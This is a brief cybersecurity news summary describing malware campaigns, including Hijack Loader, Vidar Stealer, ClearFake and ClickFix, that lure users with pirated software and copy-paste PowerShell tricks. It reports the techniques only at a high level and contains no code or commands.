Adrian Johnson
TLDR:
- Cybercriminals are exploiting free or pirated versions of commercial software to deploy malware like Hijack Loader and Vidar Stealer.
- The attackers use social engineering tactics, copy-pasting PowerShell scripts, and misleading HTML attachments to trick users into downloading and executing malicious code.
Article Summary:
Threat actors are enticing users with free software lures that contain malware loaders like Hijack Loader and information stealers like Vidar Stealer. These attacks start with password-protected archive files posing as legitimate software, leading to the execution of malicious binaries. The malware employs DLL side-loading techniques and privilege escalation to evade detection and drop additional payloads, including cryptocurrency miners. These cybercrime campaigns, such as ClearFake and ClickFix, also leverage social engineering tactics, PowerShell scripts, and HTML attachments to distribute malware like Lumma Stealer, Amadey Loader, and XMRig miner. The distribution of NetSupport RAT highlights continuous attempts to update attack chains despite the need for user interaction. Detection of these threats is challenging due to the use of legitimate processes and manual execution of malicious code. The SolarMarker campaign impersonates legitimate websites and manipulates search engine results to deliver information-stealing malware. It’s crucial for users to be cautious and avoid interacting with deceptive links to mitigate these threats.
